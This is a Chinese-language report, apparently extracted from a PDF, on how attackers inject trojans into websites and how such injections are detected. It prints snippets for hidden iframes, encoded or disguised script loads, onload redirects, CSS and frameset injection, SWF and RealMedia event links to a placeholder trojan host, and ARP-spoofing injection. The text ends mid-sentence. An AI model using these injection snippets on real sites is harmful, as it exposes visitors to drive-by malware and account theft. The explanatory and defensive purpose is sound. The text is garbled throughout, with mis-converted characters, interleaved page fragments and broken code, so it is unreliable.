1、掛馬與檢測技術報告什么是掛馬？所謂的掛馬，就是黑客通過各種手段，包括 SQL注入，敏感文件掃描，效勞器漏洞，程 序 0day, 等各種方法獲得管理員賬號，然后登陸后臺，通過數據庫備份 / 恢復 或者上傳漏洞獲得一個 webshell 。利用獲得的 webshell 修改頁面的容，向頁面中參加惡意轉向代碼。 也可以直接通過弱口令獲得效勞器或者 FTP,然后直接對頁面直接進展修改。當你訪問被參 加惡意代碼的頁面時，你就會自動的訪問被轉向的地址或者下載木馬病毒。掛馬的危害危害和應用的普與程度有關，上網人人都會， 也就是說， 人人都可能中毒。 據金山毒霸 平安實驗室統計，每天有數百萬次瀏覽與掛馬網頁有

2、關，中毒概率在20%-50%之間。很多游戲被掛馬， 黑客目的就是盜取瀏覽該玩家的游戲賬號， 而那些大型被掛馬， 那么 是為了搜集大量的肉雞。 被掛馬不僅會讓自己的失去信譽， 喪失大量客戶， 也會讓我們這些 普通用戶陷入黑客設下的陷阱，淪為黑客的肉雞。如果不小心進入了已被掛馬的， 那么會感染木馬病毒， 以致喪失大量的珍貴文件資料和 賬號密碼，其危害極大。掛馬泛濫的原因利。病毒木馬黑色產業鏈有豐厚的利潤， 去年警方抓獲的大小姐系列木馬案， 犯罪集團 3 個月獲得非常收益 3000 萬。網絡應用越普與，黑色產業鏈的從業者收益也就越高。掛馬圍哪些容易被掛馬呢？越是流量高的對黑客越有吸引力， 黑客攻破一

3、個管理上有漏洞并且 流量很高的，一天就可以感染數百萬人。那些與公共事業密切相關的，比方政府機關的，視頻， 聊天交友， 提供盜版軟件破解工具的最容易被入侵， 幾乎每周出現的熱點網絡事件都 被攻擊者利用，網民一不小心就會受熱門事件吸引中招。掛馬的常見方式1. 框架掛馬<iframe src= 地址 width=0 height=0></iframe>其中“地址處可以輸入惡意等。屬性為 0 意味著該框架是不可見的， 受害者假設不查看源代碼很難發現網頁木馬。 這個 方法也是掛馬最常用的一段代碼， 但是隨著管理員和廣闊網民平安意識的提高， 只要在源代 碼中搜索 iframe 這個

4、關鍵字，就很容易找到網頁木馬的源頭。2. js 文件掛馬只要是 JS 文件，都可以通過被惡意修改從而被掛上惡意代碼，一般被全站引用的 JS 代碼最容易被掛木馬，檢測我們可以查看 JS 代碼的左邊或下邊，壞人很喜歡將惡意代碼與 正常代碼間用很多空格或回車來進展隱藏， 所以要多看看 JS 代碼頁面有沒有被成心拉長等。 相比 iframe 這個標簽， <SCRIPTsrc="#.js" type=text/javascript> 這段代碼就顯得更加 隱蔽，因為幾乎 95%的網頁中都會出現類似的script 標簽。 利用 js 引入網頁木馬也有多種方法：在 js 中直接

5、寫出框架網頁木馬例如代碼如下：document.write("<iframe width='0' height='0' src=' 網頁木馬地址 '></iframe>") ；指定 language 的屬性為 "JScript.Encode"還可以引入其他擴展名的 js 代碼，這樣就更加具有迷惑性，例如代碼如下：<SCRIPT language="JScript.Encode" src=. #x./mm.jpg></script> ；利用

6、js 更改 body 的 innerHTML 屬性，引入網頁木馬如果對容進展編碼的話， 不但能繞過殺毒軟件的檢測， 而且增加了解密的難度， 例如代 碼如下：op.document.body.innerHTML=top.document.body.innerHTML+'rn<iframe src=" 網頁木馬地址 /%22%3E%3C/iframe%3E'；利用 JavaScript 的 window.open 方法翻開一個不可見的新窗口 例如代碼如下：<SCRIPT language=javascript>window.open(" 網 頁

7、 木 馬 地 址 ","","toolbar=no, location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1" );</script> ；利用URL欺騙例如代碼如下：a href=".163.(/迷惑用戶的地址，顯示這個地址指向木馬地址)" onMouseOver="_163_();return true;">頁面要顯示的正常容 </a> ：<SCRIPT Langua

8、ge="JavaScript">function _163_ ()var url=" 網頁木馬地址 " open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=n o,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");</SCRIPT>3. body 掛馬使用如下代碼，就可以使網頁在加載完

9、成的時候跳轉到網頁木馬的網址<body onload="window.location='網頁木馬地址："></body> 。4. css中掛馬利用層疊樣式表 CSS引入js，從而引入網頁木馬，例如代碼如下: bodybackgro un d-image:url('javascript:docume nt.write("<script src=.#X .n et/muma.js></script>")')這種方式比較難發現。5. 圖片偽裝隨著防毒技術的開展，黑客手段也不停地更新，圖片

10、木馬技術逃避殺毒監視的新技術，攻擊者將類似：.#x./test.htm中的木馬代碼植入到test.gif圖片文件中，這些嵌入代碼的圖片都可以用工具生成，攻擊者只需輸入相關的選項就可以了，如圖3。圖片木馬生成后，再利用代碼調用執行，是比較新穎的一種掛馬隱蔽方法，實例代碼如：<html>viframe src=".#x./test.htm" height=O width=0> </iframe><img src=".#x./test.jpg"></ce nter></html>注：當用戶翻開

11、#x./test.htm 是，顯示給用戶的是 #x./test.jpg ，而 #x./test.htm網頁代碼也隨之運行。6. 利用隱藏的分割框架引入網頁木馬例如代碼如下：vframeset rows="444,0" cols="*">vframe src=" 打 開 網 頁"framborder ="no"scrolli ng="auto"no resizemargi nwidth="O"margi ngheight="O">vframe s

12、rc=" 網 馬 地 址"frameborder ="no"scroll ing="no" no resizemargi nwidth="O"margi ngheight="O"></frameset>7. 在swf中掛馬網上有一些swf掛馬的工具，可以用工具替換原來網頁中的swf或單獨把swf發給對方,一可以單獨作一個可顯示swf頁的網頁。在網頁中插入swf的語法一般格式為：<OBJECTclassid=clsid:D27CDB6E-AE6D-11cf-96B8-0co

13、debase=dow nl oad.macromedia./pub/shockwave/cabs/flash/swflash.cab#vers ion= WIDTH=760 NAME=quality VALUE=high><EMBEDsrc=.7747. net/#x.swf quality=high plugi nspage=.macromedia./shockwave/dow nl oad/i ndex.cgi?P1 Prod Vers ion=ShockwaveFlashtype=applicati on /x-shockwave-flash width=760

14、 height=60></EMBED></OBJECT>8. 在影音文件中掛馬所需工具是 RealMedia Editor ，翻開工具后，然后依次選擇"文件"-"翻開Real媒體文件"，然后選擇需要編輯的視頻文件，其格式必須是Real One公司的以RM或 RMVB為擴展名的文件。接著，新建一個文本，在里面輸入 u 00:00:10:0 00:00:30.0&&_rpexternal & .#x./horse.htm ;(00:00:10.0就是發生第一事件的時間，這里是讓計算機彈出網頁;00:00:

15、30.0同樣，這是第二次發生的時間，在0時0分第30秒0微妙時彈出窗口 ；而后面的URL地址就是連接指定的木馬地址。)輸入完畢后并保存，然后依次選擇“工具-“合并事件，導入剛剛的文本。當合并完成后，依次選擇"文本"-“ Real文件另存為"，保存好即可。最后把生成的視頻文件發布網上，當對方觀看同時就會連接到你指定的木馬地址。9. 通過釣魚掛馬黑客偽造，并在釣魚上插入惡意代碼下載木馬。10. ARP掛馬并不需要真正攻陷目標：知名通常防護嚴密。ARP欺騙：對同一以太網網段中，通過ARP欺騙方法進展中間人攻擊，可劫持指定網絡流量并進展任意修改ARP欺騙掛馬：在Web請求

16、反響頁面中插入iframe等重定向代碼，從 而使得目標被“虛擬"掛馬掛馬的檢測方式1. 特征匹配文本文件型病毒的特征碼是從它的代碼中提取一處或多處此病毒特有的字符串作為病毒文件的特征，只要這些字符串稍有變化，病毒的特征也就變化了，那么必須增加病毒的特征記錄。例如，eval( “ 151 146")，這段javascript代碼提取病毒特征碼的方法是提取eval或 151 146作為特征標識，當 eval函數中代碼發生1次變化時，特征病毒庫就 要增加I條特征記錄，這往往會導致病毒庫過大，并且一旦病毒進展了變形，將無法用特征庫檢測出來。2. 虛擬機檢測采用虛擬機的方法，在虛擬機中安裝真實的操作系統，使用IE瀏覽器瀏覽網頁，進展 網頁行為檢測， 根據監控到的系統動態行為判定客戶端蜜罐系統是否被攻擊并植入木馬， 而確定網頁